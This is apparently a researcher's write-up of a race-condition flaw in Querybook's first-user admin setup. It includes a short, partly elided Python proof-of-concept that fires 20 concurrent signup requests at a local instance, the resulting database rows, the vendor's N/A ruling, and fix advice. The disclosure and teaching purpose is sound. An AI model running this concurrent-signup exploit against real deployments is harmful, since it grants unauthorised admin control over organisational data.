A deep dive into a Time-of-Check to Time-of-Use (TOCTOU) flaw during application setup, and the debate between “Internal Tools” vs. Zero Trust.
In the world of web security, Race Conditions (specifically TOCTOU — Time-of-Check to Time-of-Use) are some of the most fascinating vulnerabilities to exploit. They occur when a system checks a condition, but before it can act on that check, the state of the system changes.
Recently, while auditing Querybook (an open-source big data IDE developed by Pinterest), I discovered a classic race condition in its initial setup phase. This flaw allowed me to bypass the intended “Single Administrator” restriction and simultaneously create 20 Super-Admin accounts.
In this write-up, I’ll break down the technical flaw in the code, how I exploited it, and discuss the interesting bug bounty debate on why this was marked as “Not Applicable” (N/A) due to internal deployment assumptions.
Querybook has a convenient feature for initial deployments: the very first user who registers on a fresh instance is automatically granted the ADMIN role.
The logic is simple:
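1. When a user signs up, check whether any user already holds the ADMIN role.
2. If none does, assign the ADMIN role to this new user.
3. Otherwise, assign the USER role.
This seems logical for an initial setup. However, in concurrent environments, “simple” checks often lead to critical failures if not implemented with atomicity.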
The vulnerability resides in the backend logic, specifically in querybook/server/logic/user.py within the create_admin_when_no_admin function.
The code essentially performs a read operation (if len(get_all_admin_user_roles...) == 0) followed by a write operation (promoting the user).
The Problem: There is no database-level locking (like SELECT ... FOR UPDATE) or application-level mutex around this critical section. If multiple requests arrive close enough together that each one runs the "Check" before any of the others has committed its write, they all see 0 admins, and the application proceeds to promote all of them to the Admin role.
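To make the interleaving concrete, here is a minimal in-memory sketch of the same check-then-act pattern. It is not Querybook's code: the `roles` dict, the `signup` function, and the `after_check` barrier are hypothetical stand-ins, and the barrier exists only to force the worst-case ordering so the outcome does not depend on lucky timing.

```python
import threading

THREADS_COUNT = 20  # mirrors the 20 concurrent signups used in the PoC

# Hypothetical in-memory stand-in for the user-role table (not Querybook code).
roles = {}
# Illustrative only: holds every thread between its check and its write,
# forcing the worst-case interleaving instead of relying on timing.
after_check = threading.Barrier(THREADS_COUNT)


def signup(username):
    # Time of check: does any admin exist yet?
    no_admin_yet = not any(role == "ADMIN" for role in roles.values())
    after_check.wait()  # by now every thread has seen "zero admins"
    # Time of use: act on an answer that is already stale.
    roles[username] = "ADMIN" if no_admin_yet else "USER"


threads = [
    threading.Thread(target=signup, args=(f"user_{i}",))
    for i in range(THREADS_COUNT)
]
for t in threads:
    t.start()
for t in threads:
    t.join()

admin_count = sum(1 for role in roles.values() if role == "ADMIN")
print(admin_count)  # 20: every signup passed the check before any write landed
```

In a real server nothing forces this ordering, so the number of extra admins depends on how tightly the requests overlap; the sketch only shows that nothing prevents it.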
To prove this wasn’t just a theoretical issue, I spun up a fresh Docker instance of Querybook locally. I wrote a Python script that uses threading.Barrier to release 20 HTTP POST requests to the /ds/signup/ endpoint as close to simultaneously as possible.
Python
import threading
import requests

TARGET_URL = "http://localhost:10001/ds/signup/"
THREADS_COUNT = 20
barrier = threading.Barrier(THREADS_COUNT)

def trigger_race(thread_id):
    payload = {"username": f"admin_race_{thread_id}", "password": "Password123!", "fullname": f"Race Admin"}
    barrier.wait()  # Synchronize all threads
    requests.post(TARGET_URL, json=payload)

# ... thread execution logic ...
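The thread execution logic is elided in the script above. One plausible shape for it, as a sketch only, is a small helper that starts every worker, releases them through a shared barrier, and joins them. The name `fire_concurrently` is hypothetical, and the stand-in worker below just returns a username so the example runs without a server; in the PoC the worker would be the function that sends the signup POST.

```python
import threading


def fire_concurrently(worker, count):
    """Start `count` threads that each call worker(thread_id) after a shared barrier."""
    barrier = threading.Barrier(count)
    results = [None] * count

    def run(thread_id):
        barrier.wait()  # block until all `count` threads are ready
        results[thread_id] = worker(thread_id)

    threads = [threading.Thread(target=run, args=(i,)) for i in range(count)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()  # wait for every worker to finish before reading results
    return results


# Stand-in worker so the sketch runs offline (assumption: the real worker
# would send the HTTP request and return its status code).
demo_results = fire_concurrently(lambda thread_id: f"admin_race_{thread_id}", 5)
print(demo_results)
```

A barrier only lines the threads up on the client side; network and server scheduling still decide how closely the requests actually overlap.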
The Result:
The attack was a complete success. All 20 threads returned a 200 OK.
When I audited the MySQL database, the proof was undeniable:
Plaintext
+---------------+-------+---------------------+
| username      | role  | created_at          |
+---------------+-------+---------------------+
| admin_race_0  | ADMIN | 2026-03-22 16:37:51 |
| admin_race_1  | ADMIN | 2026-03-22 16:37:51 |
...
| admin_race_19 | ADMIN | 2026-03-22 16:37:51 |
+---------------+-------+---------------------+
20 distinct users were granted ADMIN privileges, all within the same second.
Logging into the UI with any of these accounts revealed the Admin Gear Icon, granting full access to environment settings, query engines, and all organizational data. The instance was permanently compromised.
I reported this via the Bugcrowd platform, providing the video PoC, the Python script, and the database logs. The triage team verified the issue, but the Program Owner ultimately marked it as Not Applicable (N/A).
Their Argument:
The customer stated that Querybook is intended to be an internal tool, not internet-facing. Because the vulnerable setup endpoint is only reachable from the local network during the very first run (a narrow time window), an attacker would need local network access during that exact moment. They argued that anyone with that level of internal access is already considered a “Highly Trusted User.”
The Counter-Argument (Zero Trust):
While I respect the vendor’s threat model, this highlights a massive divide in modern security philosophies:
For developers, the takeaway is clear: Never rely on non-atomic read-then-write checks for critical state changes. Always use database-level locks, unique constraints, or mutexes when handling initialization logic.
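As a rough illustration of two of those options, the sketch below shows an application-level mutex and a database constraint side by side. Everything in it is hypothetical and unrelated to Querybook's actual schema: the `roles` dict, the `bootstrap_admin` table, and both function names are assumptions, and SQLite is used only because it ships with Python. The constraint calls run sequentially here; the point is that the database, not the application, rejects every claim after the first.

```python
import sqlite3
import threading

THREADS_COUNT = 20

# --- Option 1: application-level mutex around the check-then-act section ---
roles = {}  # hypothetical in-memory role store
roles_lock = threading.Lock()


def signup_with_lock(username):
    with roles_lock:  # check and write now happen as one unit
        no_admin_yet = "ADMIN" not in roles.values()
        roles[username] = "ADMIN" if no_admin_yet else "USER"


threads = [
    threading.Thread(target=signup_with_lock, args=(f"user_{i}",))
    for i in range(THREADS_COUNT)
]
for t in threads:
    t.start()
for t in threads:
    t.join()
lock_admins = sum(1 for r in roles.values() if r == "ADMIN")

# --- Option 2: let a database constraint enforce a single bootstrap admin ---
conn = sqlite3.connect(":memory:")
conn.execute(
    "CREATE TABLE bootstrap_admin ("
    " slot INTEGER PRIMARY KEY CHECK (slot = 1),"  # at most one row can exist
    " username TEXT NOT NULL)"
)


def claim_bootstrap_admin(username):
    """Return True if this user won the single admin slot, else False."""
    try:
        with conn:  # commits on success, rolls back on error
            conn.execute(
                "INSERT INTO bootstrap_admin (slot, username) VALUES (1, ?)",
                (username,),
            )
        return True
    except sqlite3.IntegrityError:
        return False  # slot already taken: fall back to a normal user


claims = [claim_bootstrap_admin(f"user_{i}") for i in range(THREADS_COUNT)]
print(lock_admins, claims.count(True))  # 1 1
```

An in-process lock only protects a single server process, so a deployment with several workers would need the database-level approach (a constraint or a row lock) to close the window.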
For bug bounty hunters: Don’t get discouraged by “N/A” resolutions on architectural/deployment debates. The vulnerability was real, the exploit was flawless, and the technical learning was invaluable. Sometimes, the security community’s view of “Risk” simply doesn’t align with a specific company’s accepted threat model.
Keep hunting, keep writing, and never stop questioning the logic!